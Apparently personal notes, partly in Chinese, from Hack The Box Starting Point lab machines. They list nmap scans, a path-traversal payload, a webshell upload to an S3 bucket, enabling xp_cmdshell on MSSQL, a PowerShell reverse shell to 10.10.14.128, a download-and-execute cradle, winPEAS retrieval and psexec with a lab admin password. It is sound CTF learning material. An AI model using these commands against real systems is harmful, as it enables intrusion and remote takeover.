Meow
Fawn
nmap 10.129.119.29 -p 21 -sV
|
Dancing
nmap 10.129.44.223 -p 445
|
Redeemer
nmap -sS 10.129.100.239 --top-ports 5000
|
Appointment
Structured Query Language
|
Personally Identifiable Information
|
Apache httpd 2.4.38 ((Debian))
|
Sequel
Crocodile
密码在ftp服务
Responder
hosts 文件中添加
../../../../../../../../windows/system32/drivers/etc/hosts
|
可以看到密码是badminton
Three
高版本需要这样才能扫到
gobuster vhost -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u http://thetoppers.htb --append-domain
|
列出存储桶
aws --endpoint=http://s3.thetoppers.htb s3 ls
|
列出存储桶中的文件
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
|
aws --endpoint=http://s3.thetoppers.htb s3 cp zf.php s3://thetoppers.htb
|
写一个一句话木马上传
Archetype
prod.dtsConfig 是一个mssql配置文件
select is_srvrolemember ('sysadmin') //查看有无sysadmin 权限 enable_xp_cmdshell
|
EXEC sp_configure 'Show Advanced Options', 1; \\使用sp_configure系统存储过程,设置服务器配置选项,将Show Advanced Options设置为1时,允许修改数据库的高级配置选项 reconfigure; \\确认上面的操作 sp_configure; \\查看当前sp_configure配置情况 EXEC sp_configure 'xp_cmdshell', 1 \\使用sp_configure系存储过程,启用xp_cmdshell参数,来允许SQL Server调用操作系统命令 reconfigure; \\确认上面的操作 xp_cmdshell "whoami" \\在靶机上调用cmdshell执行whoami
|
尝试powershell 反弹shell
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.128",5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
xp_cmdshell powershell iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.128/zf.ps1'');
|
3e7b102e78218e935bf3f4951fec21a3
|
https://github.com/carlospolop/PEASS-ng/releases
|
wget http://10.10.14.128/winPEASany.exe -o winpeas.exe
|
./winpeas.exe log=result.txttype
|
这里找到 admin 密码
impacket-psexec administrator@10.129.71.45 MEGACORP_4dm1n!!
|